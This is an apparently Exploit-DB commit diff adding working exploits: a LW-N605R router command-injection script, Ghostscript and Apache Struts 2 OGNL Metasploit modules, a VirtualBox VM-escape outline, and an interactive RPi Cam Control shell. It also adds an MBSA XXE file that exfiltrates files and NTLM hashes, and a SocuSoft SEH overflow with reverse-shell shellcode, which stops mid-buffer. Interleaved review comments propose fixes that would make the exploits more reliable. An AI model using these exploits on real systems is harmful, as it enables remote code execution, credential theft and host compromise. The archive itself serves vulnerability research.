DB: 2018-09-11

12 changes to exploits/shellcodes

SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)
Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH)
Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)
Any Sound Recorder 2.93 - Denial of Service (PoC)
Zenmap (Nmap) 7.70 - Denial of Service (PoC)
Ghostscript - Failed Restore Command Execution (Metasploit)
VirtualBox 5.2.6.r120293 - VM Escape

Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)

RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities
RPi Cam Control < 6.3.14 - Multiple Vulnerabilities
LW-N605R 12.20.2.1486 - Remote Code Execution
RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution
This commit is contained in:
Offensive Security 2018-09-11 05:01:54 +00:00
parent 59859ec4e8
commit 87053f010c
13 changed files with 1184 additions and 1 deletions


@ -0,0 +1,146 @@
# Title: LW-N605R 12.20.2.1486 - Remote Code Execution
# Date: 2018-09-09
# Author: Nassim Asrir
# Vendor: LINK-NET
# Product Link: http://linknet-usa.com/main/product_info.php?products_id=35&language=es
# Firmware version: 12.20.2.1486
# CVE: N/A
# Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the
# HOST field of the ping feature at adm/systools.asp.
# Authentication is needed but the default password of admin for the admin
# account may be used in some cases.
# Example:
# [root@parrot]─[/home/sniperpex/Desktop]
# #python ./blue.py -t http://host/ -c ls -u admin -p admin
'''
_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim
[+] Connection in progress...
[+] Authentication in progress...
[+] Username & Password: OK
[+] Checking for vulnerability...
[!] Command "ls": was executed!
var
usr
tmp
sys
sbin
proc
mnt
media
lib
init
home
etc_ro
etc
dev
bin
'''
import urllib2
import base64
import optparse
import sys
import bs4
banner = """
_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url+"/goform/sysTools"
def connectionScan(url,user,pwd,cmd):
print '[+] Connection in progress...'
try:
response = urllib2.Request(url)
content = urllib2.urlopen(response)
print '[X] LW-N605R Authentication not found'
except urllib2.HTTPError, e:
if e.code == 404:
print '[X] Page not found'
elif e.code == 401:
try:
print '[+] Authentication in progress...'
base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None)
response.add_header("Authorization", "Basic %s" % base64string)
content = urllib2.urlopen(response).read()
if "putmsg(mPingCount);" in content:
print '[+] Username & Password: OK'
print '[+] Checking for vulnerability...'
if 'e' in content:
print '[!] Command "'+cmd+'": was executed!'
else:
print '[X] Not Vulnerable :('
else:
print '[X] No LW-N605R page found'
soup = bs4.BeautifulSoup(content, 'html.parser')
for textarea in soup.find_all('textarea'):
print textarea.get_text()
except urllib2.HTTPError, e:
if e.code == 401:
print '[X] Wrong username or password'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
connectionScan(url,user,pwd,cmd)
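Review bot: the vulnerability verdict in connectionScan is not evidence of anything: `if 'e' in content:` (the line after `print '[+] Checking for vulnerability...'`) is true for practically any HTML response, so the script prints `[!] Command "...": was executed!` even when the ping form simply echoed the page back, and anyone using this as a scanner gets false positives. The textarea text the script already extracts with BeautifulSoup is the only real signal; base the verdict on that instead of on a single letter. Smaller points: the file mixes `print(...)` with Python 2 `print '...'` statements and `except urllib2.HTTPError, e` syntax, so it runs only under Python 2, and the `sumbit=OK` parameter name should get a comment saying whether the misspelling is what the firmware expects.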

exploits/linux/local/45369.rb (Executable file, 118 lines)

@ -0,0 +1,118 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
PLACEHOLDER_STRING = 'metasploit'
PLACEHOLDER_COMMAND = 'echo vulnerable > /dev/tty'
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Ghostscript Failed Restore Command Execution',
'Description' => %q{
This module exploits a -dSAFER bypass in Ghostscript to execute
arbitrary commands by handling a failed restore (grestore) in
PostScript to disable LockSafetyParams and avoid invalidaccess.
This vulnerability is reachable via libraries such as ImageMagick,
and this module provides the latest vector for Ghostscript.
For previous Ghostscript vectors, please see the following modules:
exploit/unix/fileformat/ghostscript_type_confusion
exploit/unix/fileformat/imagemagick_delegate
},
'Author' => [
'Tavis Ormandy', # Vuln discovery and exploit
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-16509'],
['URL', 'http://seclists.org/oss-sec/2018/q3/142'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1640']
],
'DisclosureDate' => 'Aug 21 2018',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux', 'win'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {'Space' => 4089, 'DisableNops' => true} # 4096 total
],
['PowerShell (In-Memory)',
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_memory
],
['Linux (Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.ps'])
])
register_advanced_options([
OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
])
end
def exploit
sploit = template
# Replace our placeholder string with a random one
sploit.sub!(PLACEHOLDER_STRING, Rex::Text.rand_text_alphanumeric(8..42))
# Replace our test payload with the real one
case target['Type']
when :unix_memory
sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
when :psh_memory
psh = cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
# XXX: Payload space applies to the payload, not the PSH command
if psh.length > targets[0].payload_space
fail_with(Failure::BadConfig, 'Please choose a smaller payload')
end
sploit.sub!(PLACEHOLDER_COMMAND, psh)
when :linux_dropper
cmdstager = generate_cmdstager(
linemax: targets[0].payload_space,
temp: datastore['WritableDir']
).join(';')
# XXX: Payload space applies to the payload, not the command stager
if cmdstager.length > targets[0].payload_space
fail_with(Failure::BadConfig, 'Please choose a smaller command stager')
end
sploit.sub!(PLACEHOLDER_COMMAND, cmdstager)
end
file_create(sploit)
end
def template
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'ghostscript', 'msf.ps'
))
end
end
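Review bot: `sploit.sub!(PLACEHOLDER_STRING, ...)` and the three `sploit.sub!(PLACEHOLDER_COMMAND, ...)` calls in `exploit` never check their return value; `String#sub!` returns nil when the pattern is absent, so a template in data/exploits/ghostscript/msf.ps that no longer contains `metasploit` or `echo vulnerable > /dev/tty` would silently produce a file carrying the test command instead of the payload. Wrap each substitution in a check and `fail_with(Failure::BadConfig, ...)` when it returns nil. Also, the `# XXX: Payload space applies to the payload, not the PSH command` comments explain why `targets[0].payload_space` is used for the other two targets, but the 4089-byte figure itself (`# 4096 total`) deserves a sentence on where the 7-byte difference comes from.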


@ -0,0 +1,14 @@
Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000
I didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected.
Find a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. No ASLR bypass is needed since the jump is relative.
In the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server as Guest and Ubuntu Desktop as host running VirtualBox 5.2.6.r120293.
The proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844
https://www.voidsecurity.in/2018/08/from-compiler-optimization-to-code.html
https://github.com/renorobert/virtualbox-cve-2018-2844
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45372.zip
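Review bot: the second line, "I didn't see such optimization in VirtualBox for Windows and OSX", refers to a compiler optimization that the text never introduces; the first paragraph stops at "The VRAM buffer is at physical address 0xE0000000" (no full stop) and the reader has to open the voidsecurity.in link to learn what optimization turns the double fetch into a code-execution primitive. A sentence summarizing the root cause belongs between those two lines. The "Find a value in VBoxDD.so" paragraph should also be introduced as the exploitation outline for CVE-2018-2844 rather than beginning mid-procedure.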

exploits/linux/webapps/45361.py (Executable file, 104 lines)

@ -0,0 +1,104 @@
#!/usr/bin/python
import sys
import requests
import os
import re
import readline
def usage():
print "\nRPi Cam Web Interface Exploit\n"
print "Usage: %s http://host/path/to/preview.php \n" % sys.argv[0]
print "Options: "
print " -h, --help Show this help message and exit"
print ""
sys.exit(0)
def execute_command(url, cmd):
split = "---a97a13f9f48c65c72e4802fc1e516e3f---"
convert = ".) >/dev/null 2>&1; (" + cmd + ") 2>&1; echo " + split + ";#aaaaaaa"
convertCmd = "/usr/bin/ffmpeg -f image2 -i i_%05d.jpg"
data = {"convert":convert,"convertCmd":convertCmd}
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"}
try:
r = requests.post(url, headers=headers, data=data, verify=False)
if r.status_code == 200:
if len(r.content) > 0 and split in r.content:
return r.content.split(split)[0]
else:
return ""
else:
print "\n[*] Error: Received HTTP Status " + str(r.status_code) + "\n"
return ""
except requests.ConnectionError as e:
print "\n[*] Error: An error occurred while connecting to the host.\n"
exit(1)
except requests.exceptions.RequestException as e:
print "\n[*] Error: Something unexpected happened.\n"
print e
exit(1)
def main():
if len(sys.argv) < 2 or sys.argv[1] in ("-h", "--help"):
usage()
url = sys.argv[1]
print "\nRPi Cam Web Interface Exploit"
print "\n[*] Attempting exploit on:"
print " " + url
username = execute_command(url,"whoami").strip()
if len(username) == 0:
exit(1)
hostname = execute_command(url, "hostname").strip()
path = execute_command(url, "pwd").strip()
print "\n[*] Returning prompt!\n"
try:
while True:
prompt = username + "@" + hostname + ":" + path + "$ "
cmd = raw_input(prompt)
if cmd == "exit":
print "\n[*] Goodbye!\n"
return
elif cmd.startswith("cd "):
chars = set(";&|")
if any((c in chars) for c in cmd):
print "[*] This shell only supports cd as a standalone command."
else:
cmd = cmd.split()
tmpPath = " ".join(cmd[1:])
if tmpPath == "..":
if len(path.split("/")) > 2:
tmpPath = "/".join(path.split("/")[:-1])
else:
tmpPath = "/"
cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
tmpPath = execute_command(url,cmd).strip()
if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
path = tmpPath
else:
print tmpPath.split('\n')[0]
elif cmd == "clear":
os.system("clear")
else:
cmd = "cd " + path + " && " + cmd
results = execute_command(url, cmd)
if len(results) != 0:
print results
except KeyboardInterrupt:
print "\n\n[*] Goodbye!\n"
return
if __name__ == "__main__":
main()
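Review bot: the Windows-drive regex in the `cd` branch, `re.match("^[a-zA-Z]:\\)*",tmpPath)`, is malformed: in a Python string `"\\)"` is a literal `\)`, which the regex engine reads as an escaped parenthesis, so the pattern matches `X:` followed by zero or more `)` characters and never a path; since the target is a Raspberry Pi, the branch is dead code and can be dropped, leaving only the `tmpPath.startswith("/")` test. Two further points: `requests.post(..., verify=False)` disables TLS certificate validation without any comment, and `exit(1)` in execute_command is the interactive-shell builtin, which is not guaranteed to exist when the module is imported; `sys.exit(1)` is already in scope.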

exploits/multiple/remote/45367.rb (Executable file, 390 lines)

@ -0,0 +1,390 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
# Eschewing CmdStager for now, since the use of '\' and ';' are killing me
#include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',
'Description' => %q{
This module exploits a remote code execution vulnerability in Apache Struts
version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed
via an endpoint that makes use of a redirect action.
Native payloads will be converted to executables and dropped in the
server's temp dir. If this fails, try a cmd/* payload, which won't
have to write to the disk.
},
#TODO: Is that second paragraph above still accurate?
'Author' => [
'Man Yue Mo', # Discovery
'hook-s3c', # PoC
'asoto-r7', # Metasploit module
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-11776'],
['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],
['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],
['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],
],
'Privileged' => false,
'Targets' => [
[
'Automatic detection', {
'Platform' => %w{ unix windows linux },
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
},
],
[
'Windows', {
'Platform' => %w{ windows },
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
},
],
[
'Linux', {
'Platform' => %w{ unix linux },
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}
},
],
],
'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),
OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),
OptString.new('ENABLE_STATIC', [ true, 'Enable "allowStaticMethodAccess" before executing OGNL', true ]),
]
)
register_advanced_options(
[
OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),
OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', "X-#{rand_text_alpha(4)}"] ),
OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', "#{rand_text_alpha(8)}"] ),
]
)
end
def check
# METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable
ognl = "#_memberAccess['allowStaticMethodAccess']"
resp = send_struts_request(ognl)
# If vulnerable, the server should return an HTTP 302 (Redirect)
# and the 'Location' header should contain either 'true' or 'false'
if resp && resp.headers['Location']
output = resp.headers['Location']
vprint_status("Redirected to: #{output}")
if (output.include? '/true/')
print_status("Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'")
datastore['ENABLE_STATIC'] = false
CheckCode::Vulnerable
elsif (output.include? '/false/')
print_status("Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'")
datastore['ENABLE_STATIC'] = true
CheckCode::Vulnerable
else
CheckCode::Safe
end
elsif resp && resp.code==400
# METHOD 2: Generate two random numbers, ask the target to add them together.
# If it does, it's vulnerable.
a = rand(10000)
b = rand(10000)
c = a+b
ognl = "#{a}+#{b}"
resp = send_struts_request(ognl)
if resp.headers['Location'].include? c.to_s
vprint_status("Redirected to: #{resp.headers['Location']}")
print_status("Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'")
datastore['ENABLE_STATIC'] = false
CheckCode::Vulnerable
else
CheckCode::Safe
end
end
end
def exploit
case payload.arch.first
when ARCH_CMD
resp = execute_command(payload.encoded)
else
resp = send_payload()
end
end
def encode_ognl(ognl)
# Check and fail if the command contains the follow bad characters:
# ';' seems to terminates the OGNL statement
# '/' causes the target to return an HTTP/400 error
# '\' causes the target to return an HTTP/400 error (sometimes?)
# '\r' ends the GET request prematurely
# '\n' ends the GET request prematurely
# TODO: Make sure the following line is uncommented
bad_chars = %w[; \\ \r \n] # and maybe '/'
bad_chars.each do |c|
if ognl.include? c
print_error("Bad OGNL request: #{ognl}")
fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
end
end
# The following list of characters *must* be encoded or ORNL will asplode
encodable_chars = { "%": "%25", # Always do this one first. :-)
" ": "%20",
"\"":"%22",
"#": "%23",
"'": "%27",
"<": "%3c",
">": "%3e",
"?": "%3f",
"^": "%5e",
"`": "%60",
"{": "%7b",
"|": "%7c",
"}": "%7d",
#"\/":"%2f", # Don't do this. Just leave it front-slashes in as normal.
#";": "%3b", # Doesn't work. Anyone have a cool idea for a workaround?
#"\\":"%5c", # Doesn't work. Anyone have a cool idea for a workaround?
#"\\":"%5c%5c", # Doesn't work. Anyone have a cool idea for a workaround?
}
encodable_chars.each do |k,v|
#ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)
ognl.gsub!("#{k}","#{v}")
end
return ognl
end
def send_struts_request(ognl, payload: nil)
=begin #badchar-checking code
pre = ognl
=end
ognl = "${#{ognl}}"
vprint_status("Submitted OGNL: #{ognl}")
ognl = encode_ognl(ognl)
headers = {'Keep-Alive': 'timeout=5, max=1000'}
if payload
vprint_status("Embedding payload of #{payload.length} bytes")
headers[datastore['HEADER']] = payload
end
# TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs
uri = "/#{ognl}/#{datastore['ACTION']}"
resp = send_request_cgi(
#'encode' => true, # this fails to encode '\', which is a problem for me
'uri' => uri,
'method' => datastore['HTTPMethod'],
'headers' => headers
)
if resp && resp.code == 404
fail_with(Failure::UnexpectedReply, "Server returned HTTP 404, please double check TARGETURI and ACTION options")
end
=begin #badchar-checking code
print_status("Response code: #{resp.code}")
#print_status("Response recv: BODY '#{resp.body}'") if resp.body
if resp.headers['Location']
print_status("Response recv: LOC: #{resp.headers['Location'].split('/')[1]}")
if resp.headers['Location'].split('/')[1] == pre[1..-2]
print_good("GOT 'EM!")
else
print_error(" #{pre[1..-2]}")
end
end
=end
resp
end
def profile_target
# Use OGNL to extract properties from the Java environment
properties = { 'os.name': nil, # e.g. 'Linux'
'os.arch': nil, # e.g. 'amd64'
'os.version': nil, # e.g. '4.4.0-112-generic'
'user.name': nil, # e.g. 'root'
#'user.home': nil, # e.g. '/root' (didn't work in testing)
'user.language': nil, # e.g. 'en'
#'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)
}
ognl = ""
ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
ognl << %Q|('#{rand_text_alpha(2)}')|
properties.each do |k,v|
ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|
end
ognl = ognl[0...-4]
r = send_struts_request(ognl)
if r.code == 400
fail_with(Failure::UnexpectedReply, "Server returned HTTP 400, consider toggling the ENABLE_STATIC option")
elsif r.headers['Location']
# r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'
# Extract the OGNL output from the Location path, and strip the two random chars
s = r.headers['Location'].split('/')[1][2..-1]
if s.nil?
# Since the target didn't respond with an HTTP/400, we know the OGNL code executed.
# But we didn't get any output, so we can't profile the target. Abort.
return nil
end
# Confirm that all fields were returned, and non include extra (:) delimiters
# If the OGNL fails, we might get a partial result back, in which case, we'll abort.
if s.count(':') > properties.length
print_error("Failed to profile target. Response from server: #{r.to_s}")
fail_with(Failure::UnexpectedReply, "Target responded with unexpected profiling data")
end
# Separate the colon-delimited properties and store in the 'properties' hash
s = s.split(':')
i = 0
properties.each do |k,v|
properties[k] = s[i]
i += 1
end
print_good("Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}" +
" #{properties[:'os.arch']}, running as #{properties[:'user.name']}")
return properties
else
print_error("Failed to profile target. Response from server: #{r.to_s}")
fail_with(Failure::UnexpectedReply, "Server did not respond properly to profiling attempt.")
end
end
def execute_command(cmd_input, opts={})
# Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.
if cmd_input.include? ';'
print_warning("WARNING: Command contains bad characters: semicolons (;).")
end
begin
properties = profile_target
os = properties[:'os.name'].downcase
rescue
vprint_warning("Target profiling was unable to determine operating system")
os = ''
os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'
os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'
os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'
end
if (os.include? 'linux') || (os.include? 'nix')
cmd = "{'sh','-c','#{cmd_input}'}"
elsif os.include? 'win'
cmd = "{'cmd.exe','/c','#{cmd_input}'}"
else
vprint_error("Failed to detect target OS. Attempting to execute command directly")
cmd = cmd_input
end
# The following OGNL will run arbitrary commands on Windows and Linux
# targets, as well as returning STDOUT and STDERR. In my testing,
# on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.
vprint_status("Executing: #{cmd}")
ognl = ""
ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|
ognl << %q|(#p.redirectErrorStream(true)).|
ognl << %q|(#process=#p.start()).|
ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|
ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|
ognl << %q|(#r.flush())|
r = send_struts_request(ognl)
if r && r.code == 200
print_good("Command executed:\n#{r.body}")
elsif r
if r.body.length == 0
print_status("Payload sent, but no output provided from server.")
elsif r.body.length > 0
print_error("Failed to run command. Response from server: #{r.to_s}")
end
end
end
def send_payload
# Probe for the target OS and architecture
begin
properties = profile_target
os = properties[:'os.name'].downcase
rescue
vprint_warning("Target profiling was unable to determine operating system")
os = ''
os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'
os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'
os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'
end
data_header = datastore['HEADER']
if data_header.empty?
fail_with(Failure::BadConfig, "HEADER parameter cannot be blank when sending a payload")
end
random_filename = datastore['TEMPFILE']
# d = data stream from HTTP header
# f = path to temp file
# s = stream/handle to temp file
ognl = ""
ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|
ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).|
ognl << %q|(#f.setExecutable(true)).|
ognl << %q|(#f.deleteOnExit()).|
ognl << %q|(#s=new java.io.FileOutputStream(#f)).|
ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|
ognl << %q|(#s.write(#d)).|
ognl << %q|(#s.close()).|
ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|
ognl << %q|(#p.start()).|
ognl << %q|(#f.delete()).|
success_string = rand_text_alpha(4)
ognl << %Q|('#{success_string}')|
exe = [generate_payload_exe].pack("m").delete("\n")
r = send_struts_request(ognl, payload: exe)
if r && r.headers && r.headers['Location'].split('/')[1] == success_string
print_good("Payload successfully dropped and executed.")
elsif r && r.headers['Location']
vprint_error("RESPONSE: " + r.headers['Location'])
fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
elsif r && r.code == 400
fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while executing the payload")
end
end
end
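Review bot: `ENABLE_STATIC` is registered as an `OptString` with a boolean default (`OptString.new('ENABLE_STATIC', [ true, '...', true ])`), but every consumer tests it with `if datastore['ENABLE_STATIC']`; a user who sets it to `false` from the console stores the string "false", which is truthy in Ruby, so the option cannot actually be turned off. Make it an `OptBool`. In `check`, the METHOD 2 branch does `resp.headers['Location'].include? c.to_s` without the nil guard the METHOD 1 branch uses, so a 400-then-no-Location sequence raises NoMethodError instead of returning a CheckCode, and the method returns nil (not `CheckCode::Unknown`) when `resp` is nil or matches neither branch. Minor: "hte" in the METHOD 1 comment, and the `#TODO: Is that second paragraph above still accurate?` note should be resolved before merge since the description is what users read.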


@ -0,0 +1,52 @@
# Title: Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
# Date: 2018-09-08
# Author: John Page (aka hyp3rlinx)
# Vendor: Microsoft
# Software link: https://www.microsoft.com/en-us/download/details.aspx?id=7558
# Software Version: 2.3
# References: ZDI-CAN-6307
# References: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
# References: hyp3rlinx.altervista.org
# Security Issue
# Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker
# controlled server if a user opens a specially crafted ".mbsa" file.
# Exploit/POC
# Install MBSA
# https://www.microsoft.com/en-us/download/details.aspx?id=7558
# 1) "evil.mbsa"
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
# 2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
# When victim attempts open file they get prompted "Do you want to let this app
# make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft.
# After opening the local users files can be exfiltrated to a remote server.
# Moreover, we can use this to steal NTLM hashes.
# Using Forced Authentication to steal NTLM hashes
# 2) msf > use auxiliary/server/capture/smb
# msf auxiliary(smb) > exploit -j
"evil.mbsa"
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
%dtd;]>
# Result: credentials captured by remote sever
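Review bot: the step numbering is inconsistent: "payload.dtd" is step `2)`, the Metasploit listener is also `# 2) msf > use auxiliary/server/capture/smb`, and the second `"evil.mbsa"` has no number at all, so a reader cannot tell which file goes with which section. Renumber the forced-authentication part as 3) and 4) and label the second evil.mbsa as a separate variant. Typos in the header and result lines: "sever" for "server", and "unknwonfilez" should be called out as arbitrary if that is intended. The advisory also gives no fix or vendor-response status beyond the ZDI-CAN-6307 reference; a line stating whether a patched MBSA build exists would help defenders triage.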


@ -0,0 +1,67 @@
# Exploit Title: SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://www.dvd-photo-slideshow.com/ipod-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Reported but got no reply back
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key".
# Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * (548-36)
#0x1004793e : pop edi # pop esi # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0
#(C:\Program Files\Socusoft\Socusoft iPod Photo Slideshow\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x3e\x79\x04\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337
# -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
